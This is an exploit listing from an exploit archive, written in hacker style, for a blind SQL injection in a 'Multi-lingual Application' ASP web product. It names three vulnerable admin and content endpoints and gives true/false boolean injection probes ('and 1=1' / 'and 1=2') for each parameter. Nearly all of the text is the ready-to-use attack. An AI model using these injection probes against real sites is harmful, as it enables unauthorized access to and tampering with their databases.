Multi-Lingual Application Blind SQL Injection Vulnerability

2009-12-17T00:00:00
ID 1337DAY-ID-10320
Type zdt
Reporter R3d-D3v!L
Modified 2009-12-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Multi-Lingual Application Blind SQL Injection Vulnerability
===========================================================

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: multi Blind SQL Injection Vulnerability
[~] Vendor: www.charon.co.uk
[*] Software: Multi-lingual Application
[*] author: ((R3d-D3v!L))
[*] Date: 17.dec.2009
[*] T!ME: 4:20 am
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
 
[*] Err0r C0N50L3:
 
[*] http://server/multi_language/adminsection/products_update.asp?ProductID={Err0r}
 
 
[*] EV!L BL!ND sql
 
/multi_language/adminsection/products_update.asp?ProductID={Devil ro0t}
0R
/multi_language/adminsection/RegistrationResults.asp?Delete={JuPA}
oя
/multi_language/content.asp?ContentID=((M2Z))
 
[~] (Devil ro0t):
7Ru3 : products_update.asp?ProductID=1 and 1=1
f4L53: products_update.asp?ProductID=1 and 1=2
 
0R
[*]:(JUPA)
7Ru3 : RegistrationResults.asp?Delete=1 and 1=1
f4L53: RegistrationResults.asp?Delete=1 and 1=2
 
0я
[*]:(M2Z)
7Ru3 : content.asp?ContentID=1 and 1=1
f4L53: content.asp?ContentID=1 and 1=2
 
N073:
 
! 7h!/\/k u can f!nd m0r3
 
just let your m1nd breath ;)



#  0day.today [2018-04-12]  #